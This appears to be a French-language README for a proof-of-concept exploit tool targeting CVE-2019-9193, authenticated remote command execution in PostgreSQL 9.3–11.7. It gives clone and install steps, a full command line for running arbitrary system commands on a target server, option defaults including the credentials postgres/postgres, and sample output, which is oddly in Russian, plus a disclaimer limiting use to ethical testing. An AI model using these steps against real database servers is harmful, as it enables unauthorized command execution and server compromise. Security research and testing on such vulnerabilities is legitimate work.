
est un outil PoC conçu pour exploiter une vulnérabilité d'exécution de code à distance (RCE) authentifiée dans des versions spécifiques de PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit est un outil PoC conçu pour exploiter une vulnérabilité d'exécution de code à distance (RCE) authentifiée dans des versions spécifiques de PostgreSQL (9.3 - 11.7). Il permet aux utilisateurs authentifiés d'exécuter des commandes système sur un serveur de base de données PostgreSQL vulnérable à CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <ip_cible> -p <port> -d <nom_base> -U <utilisateur> -P <mot_de_passe> -c "<commande_systeme>"
-i, --ip : Adresse IP du serveur PostgreSQL (Par défaut : 127.0.0.1)-p, --port : Port du serveur PostgreSQL (Par défaut : 5432)-d, --database : Nom de la base de données PostgreSQL (Par défaut : template1)-U, --user : Nom d'utilisateur pour se connecter au serveur PostgreSQL (Par défaut : postgres)-P, --password : Mot de passe pour se connecter au serveur PostgreSQL (Par défaut : postgres)-c, --command : Commande système à exécuter sur le serveur-t, --timeout : Délai d'attente de connexion en secondes (Par défaut : 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Cet exemple se connecte à un serveur PostgreSQL à 192.168.1.10, s'authentifie avec les informations fournies et exécute la commande whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
Cet outil est destiné uniquement à des fins éducatives et de tests éthiques. Toute utilisation non autorisée de cet outil contre des systèmes est illégale et strictement interdite. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.